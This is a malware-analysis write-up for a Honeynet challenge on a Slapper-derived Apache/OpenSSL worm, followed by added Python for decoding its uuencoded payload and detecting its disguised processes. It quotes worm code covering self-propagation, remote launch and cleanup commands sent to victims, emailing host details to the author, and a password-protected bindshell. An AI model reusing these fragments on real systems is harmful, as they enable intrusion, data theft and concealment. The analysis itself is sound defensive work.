The Challenge:

Members from the Honeynet.BR team have captured a new worm from the wild. The file (.unlock) was used by the worm to infect the honeypot. Your mission is to analyze the captured file in order to answer the questions below. Be sure you review the submission rules at the SotM challenge page before submitting your results.

Download the Binary

Note: The MD5 and SHA1 checksums are shown below.

    MD5 (.unlock) = a03b5be9264651ab30f2223592befb42

    $ md5sum .unlock
    a03b5be9264651ab30f2223592befb42  .unlock

Questions and Answers:
----------------------

1. Which is the type of the .unlock file? When was it generated?

    $ file .unlock
    .unlock: gzip compressed data, from Unix
    $ mv .unlock unlock.gz;gzip -d -v unlock.gz
    unlock.gz:   78.0% -- replaced with unlock
    $ ls -l unlock;file unlock
    -rw-r-----  1 user  user  81920 Sep 22 17:06 unlock
    unlock: GNU tar archive

Have a look in the tar, then extract:

    $ tar -tvf unlock
    -rw-r--r-- root/wheel    70981 2002-09-20 13:28 .unlock.c
    -rw-r--r-- root/wheel     2792 2002-09-19 21:57 .update.c

So, .unlock is simply a renamed gzip-compressed tar file. The member timestamps date it to 20 September 2002.

2. Based on the source code, who is the author of this worm? When was it created? Is it compatible with the date from question 1?

contem@efnet initially modified this worm from the Apache worm; the source was then modified by aion (aion@ukr.net). As part of his changes he has amended the VERSION define, see below:

    #define VERSION 20092002

So yes, the two date stamps corroborate each other: 20092002 is 20 September 2002, matching the timestamp of .unlock.c in the tar.

3. Which process name is used by the worm when it is running?

The new author, aion, has attempted to mask the original process name with the small addition of code below. All this does is overwrite the arguments (and original filename) in the process list with NUL bytes, and then copy the previously declared PSNAME into argv[0]. The running worm therefore shows up as "httpd " (with a trailing space).

    line 78:   #define PSNAME "httpd "

    line 1803: for(a=0;argv[0][a]!=0;a++) argv[0][a]=0;
    line 1804: for(a=0;argv[1][a]!=0;a++) argv[1][a]=0;
    line 1805: strcpy(argv[0],PSNAME);

4. In which format does the worm copy itself to the newly infected machine? Which files are created in the whole process? After the worm executes itself, which files remain on the infected machine?

The way the worm propagates has not been modified from the original worm. In the excerpt of code below you can see that the worm encodes itself in the same way 'uuencode' does. This function encodes the binary (in this case the compressed tar file) into ASCII.

    line 1194: int encode(int a) {
    line 1195:     register int ch, n;
    line 1196:     register char *p;
    line 1197:     char buf[80];
    line 1198:     FILE *in;
    line 1199:     if ((in=fopen(WORMSRC,"r")) == NULL) return 0;
    line 1200:     writem(a,UUHEAD);
    line 1201:     while ((n = fread(buf, 1, 45, in))) {
    line 1202:         ch = ENC(n);
    line 1203:         if (sendch(a,ch) <= ASUCCESS) break;
    line 1204:         for (p = buf; n > 0; n -= 3, p += 3) {
    line 1205:             if (n < 3) {
    line 1206:                 p[2] = '\0';
    line 1207:                 if (n < 2) p[1] = '\0';
    line 1208:             }
    line 1209:             ch = *p >> 2;
    line 1210:             ch = ENC(ch);
    line 1211:             if (sendch(a,ch) <= ASUCCESS) break;
    line 1212:             ch = ((*p << 4) & 060) | ((p[1] >> 4) & 017);
    line 1213:             ch = ENC(ch);
    line 1214:             if (sendch(a,ch) <= ASUCCESS) break;
    line 1215:             ch = ((p[1] << 2) & 074) | ((p[2] >> 6) & 03);
    line 1216:             ch = ENC(ch);
    line 1217:             if (sendch(a,ch) <= ASUCCESS) break;
    line 1218:             ch = p[2] & 077;
    line 1219:             ch = ENC(ch);
    line 1220:             if (sendch(a,ch) <= ASUCCESS) break;
    line 1221:         }
    line 1222:         ch='\n';
    line 1223:         if (sendch(a,ch) <= ASUCCESS) break;
    line 1224:         usleep(10);
    line 1225:     }
    line 1226:     if (ferror(in)) {
    line 1227:         fclose(in);
    line 1228:         return 0;
    line 1229:     }
    line 1230:     ch = ENC('\0');
    line 1231:     sendch(a,ch);
    line 1232:     ch = '\n';
    line 1233:     sendch(a,ch);
    line 1234:     writem(a,"end\n");
    line 1235:     if (in) fclose(in);
    line 1236:     return 1;
    line 1237: }

Below is the code which is executed after the propagation, the cleaning step:

    line 1427: writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
    line 1428:               " /tmp/httpd /tmp/update; exit; \n");

The files created in the process are therefore /tmp/.unlock.uu, /tmp/.unlock, /tmp/.unlock.c, /tmp/.update.c, /tmp/httpd and /tmp/update. The cleanup leaves only /tmp/.unlock, which is the compressed tar file we are investigating.

5. Which port is scanned by the worm?

As shown in the portion below, the definition is for port 80.

    line 67:   #define SCANPORT 80

This is used in the function atcp_sync_connect(), which is called from line 1923 in main(). The protocol is, as suggested, TCP. This is confirmed in the 5th line of the atcp_sync_connect() function:

    line 448:  if ((inst->sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {

6. Which vulnerability does the worm try to exploit? On which architectures?

The worm is based on the Linux Slapper worm [1], which takes advantage of the buffer overflow vulnerability affecting SSLv2-enabled OpenSSL 0.9.6d and earlier installations of the Apache web server [2]. This can provide remote unprivileged shell access. The only architecture affected is Intel x86.

7. What kind of information is sent by the worm by email? To which account?

The information is sent to the email address defined on line 77:

    line 77:   #define MAILTO "aion@ukr.net"

The details sent to the address are:

 1) The hostid of the machine.
 2) The currently assigned hostname of the machine, obtained from gethostname().
 3) The IP address of the machine that is currently infecting it.

    line 113:  gethostname(buffer,128);

    line 122:  sprintf(cmdbuf," hostid: %d \r\n"
    line 123:                 " hostname: %s \r\n"
    line 124:                 " att_from: %s \r\n",gethostid(),buffer,sip);

'sip' is defined at the beginning of the mailme() function as a pointer:

    line 94:   int mailme(char *sip)

The mailme() function is called from main():

    line 1802: mailme(argv[1]); zhdr(0);

And argv[1], the first argument given to the program, is the IP address of the machine currently infecting (the attacker's own local IP). This is shown in the portion of code below, which shows the steps after the currently infected machine infects another. It launches the worm (on the newly infected machine) with the IP address of the machine currently infecting. This is to continue the P2P network that is created.

    line 1425: sprintf(rcv, "/tmp/httpd %s; /tmp/update; \n",localip);
    line 1426: writem(sockfd,rcv); sleep(3);

8. Which port (and protocol) is used by the worm to communicate with other infected machines?

The worm communicates through the User Datagram Protocol (UDP) on port 4156. The port is defined below:

    line 66:   #define PORT 4156

After the daemon is launched, the worm sets up the local port to listen on 4156/udp so that other worms can communicate with it. From main():

    line 1781: if (audp_listen(&udpserver,PORT) != 0) {
    line 1782:     printf("Error: %s\n",aerror(&udpserver));
    line 1783:     return 0;
    line 1784: }

    line 589:  int audp_listen(struct ainst *inst,unsigned int port) {
    ..
    line 592:  if ((inst->sock = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0) {

9. Name 3 functionalities built into the worm to attack other networks.

There are four denial-of-service attacks built into the worm. They are as follows:

 1) A non-blocking UDP flood, with packets less than 9216 bytes in size. The destination port can be defined as random or static.
 2) A non-blocking TCP connect() flood. Options include a random or definable destination port.
 3) A non-blocking IPv6 TCP connect() flood. Again, with an optional destination port.
 4) A UDP-based DNS flood.

All of these attacks are called from the main() loop. Since the worm does not run as root, and makes no attempt to obtain root privileges, these DoS attacks do not have their source addresses forged.

10. What is the purpose of the .update.c program? Which port does it use?

.update.c is a very simple shell-on-a-port (bindshell) program. It listens on port 1052/tcp for connections. This program also attempts to mask its process name, but this time it uses the definition 'update '.

    line 8:    #define PSNAME "update " // what copy to argv[0]

    line 34:   for(retval=0;argv[0][retval]!=0;retval++) argv[0][retval]=0;
    line 35:   strcpy(argv[0],PSNAME);

Upon connecting to port 1052, if you supply the password "aion1981" you will get an interactive shell.

11. Bonus Question: What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?

These values attempt to make the bindshell a little less obvious. What happens is that the bindshell opens the port for 10 seconds, closes it and then sleeps for 300 seconds (5 minutes). I can only assume that this is so that if the administrator has scheduled network scans (or the like), the chances of hitting the open port in that 10 second time frame are limited. Although this goes both ways: how would the attacker actually know the bindshell is running without connecting every 10 seconds for 5 minutes?

    line 6:    #define SLEEPTIME 300 // sleep 5 min.
    line 7:    #define UPTIME 10 // listen 10 sec.

    line 52:   for(stimer=time(NULL);(stimer+UPTIME)>time(NULL);)
    ..
    line 70:   }
    line 71:
    line 72:   closeall();
    line 73:   sleep(SLEEPTIME);

References:
-----------

[1]. http://www.cert.org/advisories/CA-2002-27.html
[2]. http://www.kb.cert.org/vuls/id/102795
[3]. http://packetstormsecurity.org/distributed/pud.tgz - Original DDoS Daemon code.
[4]. http://packetstormsecurity.org/worms/apache-worm.c - Original Apache worm for the chunked vulnerability against FreeBSD.
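For the encode() excerpt in question 4 above, the following Python is an added example written for this page; it is neither the worm's code nor part of the original write-up. It re-implements the same uuencode loop with sendch() replaced by string building, adds the decoder an analyst needs to recover the tar from a captured .unlock.uu, and cross-checks each line against Python's binascii. The ENC() macro and the UUHEAD string are not shown on the page; the classic BSD definitions (a zero value maps to '`', which is what produces the "`" line at line 1230, and a header of the form "begin 644 .unlock") are assumed. The sample payload is constructed, not the real .unlock.

```python
import binascii

# Added example: a Python re-implementation of the worm's encode() routine
# (lines 1194-1237) plus the matching decoder. ENC() and UUHEAD are assumed
# to be the classic BSD uuencode definitions (zero -> '`', "begin 644 name").
LINE_BYTES = 45      # fread(buf, 1, 45, in) on line 1201


def enc(c: int) -> str:
    """ENC(c): six-bit value -> printable character, zero -> backtick."""
    return '`' if c == 0 else chr((c & 0o77) + ord(' '))


def dec(ch: str) -> int:
    """Inverse of enc(): both ' ' and '`' decode to zero."""
    return (ord(ch) - ord(' ')) & 0o77


def uuencode_line(chunk: bytes) -> str:
    """Encode up to 45 bytes exactly as the loop on lines 1201-1223 does."""
    n = len(chunk)
    out = [enc(n)]                        # length character, line 1202
    buf = bytearray(chunk) + b'\x00\x00'  # zero padding, lines 1205-1208
    for i in range(0, n, 3):
        p0, p1, p2 = buf[i], buf[i + 1], buf[i + 2]
        out.append(enc(p0 >> 2))                                  # line 1209
        out.append(enc(((p0 << 4) & 0o60) | ((p1 >> 4) & 0o17)))  # line 1212
        out.append(enc(((p1 << 2) & 0o74) | ((p2 >> 6) & 0o3)))   # line 1215
        out.append(enc(p2 & 0o77))                                # line 1218
    out.append('\n')                                              # line 1222
    return ''.join(out)


def uuencode_payload(data: bytes, name: str = ".unlock", mode: str = "644") -> str:
    """Whole transfer as the worm writes it: header, data lines, '`', 'end'."""
    lines = [f"begin {mode} {name}\n"]            # assumed form of UUHEAD
    for i in range(0, len(data), LINE_BYTES):
        lines.append(uuencode_line(data[i:i + LINE_BYTES]))
    lines.append("`\n")                            # ENC('\0') + '\n', lines 1230-1233
    lines.append("end\n")                          # line 1234
    return ''.join(lines)


def uudecode_payload(text: str):
    """Decode a captured transfer back to (file name, bytes)."""
    lines = text.split('\n')
    header = lines[0].split()
    if len(header) != 3 or header[0] != "begin":
        raise ValueError("missing uuencode begin header")
    out = bytearray()
    for line in lines[1:]:
        if line == "end":
            break
        if not line:
            continue
        n = dec(line[0])
        if n == 0:                    # the '`' terminator line
            continue
        body = line[1:]
        chunk = bytearray()
        for i in range(0, len(body), 4):
            c0, c1, c2, c3 = (dec(x) for x in body[i:i + 4].ljust(4, '`'))
            chunk += bytes([((c0 << 2) | (c1 >> 4)) & 0xff,
                            ((c1 << 4) | (c2 >> 2)) & 0xff,
                            ((c2 << 6) | c3) & 0xff])
        out += chunk[:n]              # drop the padding bytes of a short line
    return header[2], bytes(out)


def matches_reference(data: bytes) -> bool:
    """Cross-check every line against Python's own uuencoder (backtick mode)."""
    for i in range(0, len(data), LINE_BYTES):
        chunk = data[i:i + LINE_BYTES]
        ref = binascii.b2a_uu(chunk, backtick=True).decode("ascii")
        if uuencode_line(chunk) != ref:
            return False
    return True


# Constructed sample payload (not the real .unlock): every byte value, a zero
# run to exercise the '`' mapping, and a short final line.
SAMPLE = bytes(range(256)) + b"\x00\x00\x00\x00" + b"tar.gz"

if __name__ == "__main__":
    text = uuencode_payload(SAMPLE)
    print(text)
    name, data = uudecode_payload(text)
    print(name, len(data), data == SAMPLE, matches_reference(SAMPLE))
```

Run it directly to print the encoded form of the constructed sample; feed uudecode_payload() the text of a captured transfer to get the tar back, then continue with the gzip and tar steps from question 1.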
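For the argv rewriting in questions 3 and 10 above, here is an added defender-side check; it is example code written for this page, not from the worm or the original write-up. Overwriting argv changes what ps prints, but not the target of /proc/<pid>/exe or the layout of /proc/<pid>/cmdline, so the two can be compared. The ProcInfo records are constructed samples of what /proc would show after lines 1803-1805 (and 34-35 of .update.c) have run, next to two legitimate processes; scan_proc() runs the same check over a live Linux /proc.

```python
import os
from dataclasses import dataclass, field
from typing import Dict, List

# Added example: compare what a process says about itself (argv) with what the
# kernel knows (exe). The records at the bottom are constructed samples.
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")   # no daemon should run from here


@dataclass
class ProcInfo:
    pid: int
    exe: str                                        # target of /proc/<pid>/exe
    argv: List[str] = field(default_factory=list)   # /proc/<pid>/cmdline split on NUL


def masking_indicators(p: ProcInfo) -> List[str]:
    """Return why a process looks like it rewrote its own name; [] if it looks clean."""
    reasons = []
    exe = p.exe
    if exe.endswith(" (deleted)"):
        reasons.append("executable was unlinked after it started")
        exe = exe[:-len(" (deleted)")]
    if exe.startswith(SUSPICIOUS_DIRS):
        reasons.append(f"executable runs from {os.path.dirname(exe)}")
    argv0 = p.argv[0] if p.argv else ""
    if argv0 != argv0.rstrip():
        # PSNAME "httpd " / "update " is copied over argv[0] with a trailing space
        reasons.append("argv[0] padded with trailing whitespace")
    shown = os.path.basename(argv0.strip().lstrip("-"))   # "-bash" is a login shell
    exe_base = os.path.basename(exe)
    if shown and exe_base and shown != exe_base:
        reasons.append(f"argv[0] {shown!r} does not match executable {exe_base!r}")
    if any(a == "" for a in p.argv[1:]):
        # the worm zeroes argv[1] (the IP it was started with) in place,
        # which leaves empty slots in /proc/<pid>/cmdline
        reasons.append("blank argument slots (arguments overwritten in place)")
    return reasons


def read_proc(pid: int) -> ProcInfo:
    """Build a ProcInfo from the live /proc on Linux (exe needs permission)."""
    base = f"/proc/{pid}"
    try:
        exe = os.readlink(f"{base}/exe")
    except OSError:
        exe = ""                                  # kernel thread or not permitted
    with open(f"{base}/cmdline", "rb") as f:
        argv = f.read().decode("utf-8", "replace").split("\0")
    if argv and argv[-1] == "":
        argv.pop()                                # cmdline is NUL-terminated
    return ProcInfo(pid, exe, argv)


def scan_proc() -> Dict[int, List[str]]:
    """Run the check over every process visible in /proc."""
    findings = {}
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            p = read_proc(int(entry))
        except OSError:
            continue
        reasons = masking_indicators(p)
        if reasons:
            findings[p.pid] = reasons
    return findings


# Constructed samples: the worm and its bindshell after the argv rewrite,
# next to a legitimate Apache and a login shell.
WORM = ProcInfo(4242, "/tmp/httpd", ["httpd ", "", "", ""])
BINDSHELL = ProcInfo(4243, "/tmp/update", ["update "])
APACHE = ProcInfo(800, "/usr/sbin/httpd", ["/usr/sbin/httpd", "-k", "start"])
LOGIN_SHELL = ProcInfo(2000, "/usr/bin/bash", ["-bash"])

if __name__ == "__main__":
    for sample in (WORM, BINDSHELL, APACHE, LOGIN_SHELL):
        print(sample.pid, sample.exe, masking_indicators(sample) or "clean")
    if os.path.isdir("/proc"):
        for pid, reasons in scan_proc().items():
            print(pid, reasons)
```

The argv[0]/exe comparison alone is a weak signal, since daemons such as sshd legitimately rewrite their title; the combination with an executable under /tmp and blanked argument slots is what singles out the worm and its bindshell here.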